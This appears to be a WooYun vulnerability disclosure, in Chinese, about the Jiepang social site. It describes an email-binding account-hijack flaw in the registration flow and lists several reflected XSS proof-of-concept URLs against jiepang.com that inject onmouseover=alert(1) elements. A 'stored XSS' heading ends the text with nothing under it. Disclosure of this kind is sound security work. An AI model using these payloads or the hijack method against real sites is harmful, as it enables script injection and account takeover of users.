WooYun.org

邮件地址劫持漏洞：
正常用户注册街旁后如果不去点击注册后收到的email地址激活确认邮件(街旁在这里存在一个严重的设计失误，在注册成功后没有提示用户已经发送了一封激活确认邮件)，则恶意用户可以用该邮件地址继续注册新用户(如果不点击激活邮件，则注册时并不验证邮件地址是否已被注册)。当正常用户忘记用户名或者密码试图用邮件地址登录时，则需要去点击激活确认邮件，恶意攻击者可以结合XSS或者社工欺骗技术，将激活恶意用户与邮件地址的绑定关系，则正常用户再也无法登陆自己注册的账号了。（这个漏洞已经和技术人员讨论确认，将修改注册流程，目前看来还是没有修补哦）
反射性XSS：
http://jiepang.com/search?q=%22%3E%3Chr%20onmouseover=alert(1)%3E
http://jiepang.com/user/history?id=512655736%22%3E%3Chr%20onmouseover=alert(1)%3E%3C%22#
http://jiepang.com/partner?bizvenue=http://jiepang.com/venue/A5E2C2E92C447068%22%3E%3Cinput%20onmouseover=alert(1)%3E%3C%22
http://jiepang.com/user/login?back_url=/user/resetpassword"><input%20onmouseover=alert(1)>"
http://jiepang.com/user/login?back_url=/user/%22%3E%3Cinput%3E%3C%22
存储型XSS：